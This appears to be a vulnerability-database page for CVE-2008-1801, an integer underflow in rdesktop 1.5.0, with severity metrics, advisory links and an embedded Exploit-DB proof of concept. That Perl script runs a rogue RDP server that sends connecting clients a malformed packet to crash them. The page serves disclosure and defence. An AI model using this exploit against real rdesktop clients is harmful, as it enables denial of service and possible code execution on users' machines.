CVE-2008-1801 : Detail

CVE-2008-1801

95.06%V3
Network
2008-05-12
14h00 +00:00
2017-09-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Integer underflow in the iso_recv_msg function (iso.c) in rdesktop 1.5.0 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a Remote Desktop Protocol (RDP) request with a small length field.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-189 Category : Numeric Errors
Weaknesses in this category are related to improper calculation or conversion of numbers.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 5561

Publication date : 2008-05-07 22h00 +00:00
Author : Guido Landi
EDB Verified : Yes

#!/usr/bin/perl # # http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=696 use warnings; use strict; use IO::Socket; my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '3389', Listen => 1, Reuse => 1) || die($!); while(my $c = $sock->accept()) { print $c "\x03" .# TPKT version "\x00" .# reserved "\x00\x01" .# evil length here "\x06\xd0\x00\x00\x12\x34\x00" . "\x41" x 204942; sleep 1; close $sock; } # milw0rm.com [2008-05-08]

Products Mentioned

Configuraton 0

Rdesktop>>Rdesktop >> Version 1.5.0

References

http://secunia.com/advisories/31224
Tags : third-party-advisory, x_refsource_SECUNIA
https://www.exploit-db.com/exploits/5561
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/30118
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.ubuntu.com/usn/usn-646-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://security.gentoo.org/glsa/glsa-200806-04.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://secunia.com/advisories/30713
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1019990
Tags : vdb-entry, x_refsource_SECTRACK
http://www.debian.org/security/2008/dsa-1573
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.redhat.com/support/errata/RHSA-2008-0725.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.vupen.com/english/advisories/2008/2403
Tags : vdb-entry, x_refsource_VUPEN
http://www.securityfocus.com/bid/29097
Tags : vdb-entry, x_refsource_BID
http://sunsolve.sun.com/search/document.do?assetkey=1-26-240708-1
Tags : vendor-advisory, x_refsource_SUNALERT
http://secunia.com/advisories/30380
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.mandriva.com/security/advisories?name=MDVSA-2008:101
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.redhat.com/support/errata/RHSA-2008-0576.html
Tags : vendor-advisory, x_refsource_REDHAT
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=696
Tags : third-party-advisory, x_refsource_IDEFENSE
http://www.redhat.com/support/errata/RHSA-2008-0575.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/30248
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/31928
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/31222
Tags : third-party-advisory, x_refsource_SECUNIA